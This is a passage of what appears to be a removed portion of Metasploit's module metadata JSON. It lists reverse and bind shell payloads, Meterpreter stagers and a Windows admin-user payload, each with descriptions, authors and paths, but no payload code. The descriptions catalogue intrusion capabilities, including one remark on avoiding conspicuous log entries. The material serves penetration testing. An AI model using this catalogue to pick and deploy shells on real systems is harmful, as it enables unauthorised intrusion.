"payload", - "author": [ - "cazz " - ], - "description": "Creates an interactive shell via perl", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/reverse_perl.rb", - "is_install_path": true, - "ref_name": "php/reverse_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/reverse_php": { - "name": "PHP Command Shell, Reverse TCP (via PHP)", - "fullname": "payload/php/reverse_php", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Reverse PHP connect back shell with checks for disabled functions", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/reverse_php.rb", - "is_install_path": true, - "ref_name": "php/reverse_php", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/shell_findsock": { - "name": "PHP Command Shell, Find Sock", - "fullname": "payload/php/shell_findsock", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/shell_findsock.rb", - "is_install_path": true, - "ref_name": "php/shell_findsock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/exec": { - "name": "Python Execute Command", - "fullname": "payload/python/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-04 10:43:40 +0000", - "path": "/modules/payloads/singles/python/exec.rb", - "is_install_path": true, - "ref_name": "python/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter/bind_tcp": { - "name": "Python Meterpreter, Python Bind TCP Stager", - "fullname": "payload/python/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/bind_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp" - }, - "payload_python/meterpreter/bind_tcp_uuid": { - "name": "Python Meterpreter, Python Bind TCP Stager with UUID Support", - "fullname": "payload/python/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp_uuid" - }, - "payload_python/meterpreter/reverse_http": { - "name": "Python Meterpreter, Python Reverse HTTP Stager", - "fullname": "payload/python/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_http.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_http" - }, - "payload_python/meterpreter/reverse_https": { - "name": "Python Meterpreter, Python Reverse HTTPS Stager", - "fullname": "payload/python/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_https.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_https" - }, - "payload_python/meterpreter/reverse_tcp": { - "name": "Python Meterpreter, Python Reverse TCP Stager", - "fullname": "payload/python/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp" - }, - "payload_python/meterpreter/reverse_tcp_ssl": { - "name": "Python Meterpreter, Python Reverse TCP SSL Stager", - "fullname": "payload/python/meterpreter/reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell ", - "RageLtMan" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_ssl" - }, - "payload_python/meterpreter/reverse_tcp_uuid": { - "name": "Python Meterpreter, Python Reverse TCP Stager with UUID Support", - "fullname": "payload/python/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_uuid" - }, - "payload_python/meterpreter_bind_tcp": { - "name": "Python Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/python/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect to the victim and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter_reverse_http": { - "name": "Python Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/python/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter_reverse_https": { - "name": "Python Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/python/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter_reverse_tcp": { - "name": "Python Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/python/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/pingback_bind_tcp": { - "name": "Python Pingback, Bind TCP (via python)", - "fullname": "payload/python/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Listens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/pingback_bind_tcp.rb", - "is_install_path": true, - "ref_name": "python/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/pingback_reverse_tcp": { - "name": "Python Pingback, Reverse TCP (via python)", - "fullname": "payload/python/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Connects back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_bind_tcp": { - "name": "Command Shell, Bind TCP (via python)", - "fullname": "payload/python/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mumbai" - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "python/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_sctp": { - "name": "Command Shell, Reverse SCTP (via python)", - "fullname": "payload/python/shell_reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-08 06:44:37 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_sctp.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_tcp": { - "name": "Command Shell, Reverse TCP (via python)", - "fullname": "payload/python/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Campbell " - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_tcp_ssl": { - "name": "Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/python/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_udp": { - "name": "Command Shell, Reverse UDP (via python)", - "fullname": "payload/python/shell_reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_udp.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_r/shell_bind_tcp": { - "name": "R Command Shell, Bind TCP", - "fullname": "payload/r/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Continually listen for a connection and spawn a command shell via R", - "references": [], - "platform": "R", - "arch": "r", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/r/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "r/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_r/shell_reverse_tcp": { - "name": "R Command Shell, Reverse TCP", - "fullname": "payload/r/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and create a command shell via R", - "references": [], - "platform": "R", - "arch": "r", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "r/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/pingback_bind_tcp": { - "name": "Ruby Pingback, Bind TCP", - "fullname": "payload/ruby/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Listens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 19:02:28 +0000", - "path": "/modules/payloads/singles/ruby/pingback_bind_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/pingback_reverse_tcp": { - "name": "Ruby Pingback, Reverse TCP", - "fullname": "payload/ruby/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Connect back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 19:02:28 +0000", - "path": "/modules/payloads/singles/ruby/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_bind_tcp": { - "name": "Ruby Command Shell, Bind TCP", - "fullname": "payload/ruby/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn ", - "hdm " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_bind_tcp_ipv6": { - "name": "Ruby Command Shell, Bind TCP IPv6", - "fullname": "payload/ruby/shell_bind_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn ", - "hdm " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "ruby/shell_bind_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_reverse_tcp": { - "name": "Ruby Command Shell, Reverse TCP", - "fullname": "payload/ruby/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn ", - "hdm " - ], - "description": "Connect back and create a command shell via Ruby", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "ruby/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_ruby/shell_reverse_tcp_ssl": { - "name": "Ruby Command Shell, Reverse TCP SSL", - "fullname": "payload/ruby/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and create a command shell via Ruby, uses SSL", - "references": [], - "platform": "Ruby", - "arch": "ruby", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "ruby/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/sparc/shell_bind_tcp": { - "name": "Solaris Command Shell, Bind TCP Inline", - "fullname": "payload/solaris/sparc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Solaris", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/sparc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/sparc/shell_find_port": { - "name": "Solaris Command Shell, Find Port Inline", - "fullname": "payload/solaris/sparc/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Solaris", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb", - "is_install_path": true, - "ref_name": "solaris/sparc/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/sparc/shell_reverse_tcp": { - "name": "Solaris Command Shell, Reverse TCP Inline", - "fullname": "payload/solaris/sparc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Solaris", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/sparc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/x86/shell_bind_tcp": { - "name": "Solaris Command Shell, Bind TCP Inline", - "fullname": "payload/solaris/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Solaris", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/x86/shell_find_port": { - "name": "Solaris Command Shell, Find Port Inline", - "fullname": "payload/solaris/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Solaris", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "solaris/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_solaris/x86/shell_reverse_tcp": { - "name": "Solaris Command Shell, Reverse TCP Inline", - "fullname": "payload/solaris/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Solaris", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "solaris/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_tty/unix/interact": { - "name": "Unix TTY, Interact with Established Connection", - "fullname": "payload/tty/unix/interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Interacts with a TTY on an established socket connection", - "references": [], - "platform": "Unix", - "arch": "tty", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/tty/unix/interact.rb", - "is_install_path": true, - "ref_name": "tty/unix/interact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/adduser": { - "name": "Windows Execute net user /ADD", - "fullname": "payload/windows/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "Chris John Riley", - "vlad902 ", - "sf " - ], - "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/adduser.rb", - "is_install_path": true, - "ref_name": "windows/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/custom/bind_hidden_ipknock_tcp": { - "name": "Windows shellcode stage, Hidden Bind Ipknock TCP Stager", - "fullname": 